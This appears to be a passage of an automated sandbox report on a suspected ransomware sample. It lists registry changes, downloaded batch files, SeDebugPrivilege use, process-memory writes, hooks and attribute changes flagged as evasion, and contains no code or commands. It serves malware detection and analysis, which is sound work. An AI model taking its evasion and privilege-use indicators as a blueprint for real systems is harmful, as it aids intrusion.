Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 0100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\OpenWith.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 153799.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\new.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 335134.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\startupppp.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 2876 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2876 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 2140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 4588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 4588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3884 wrote to memory of 5048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

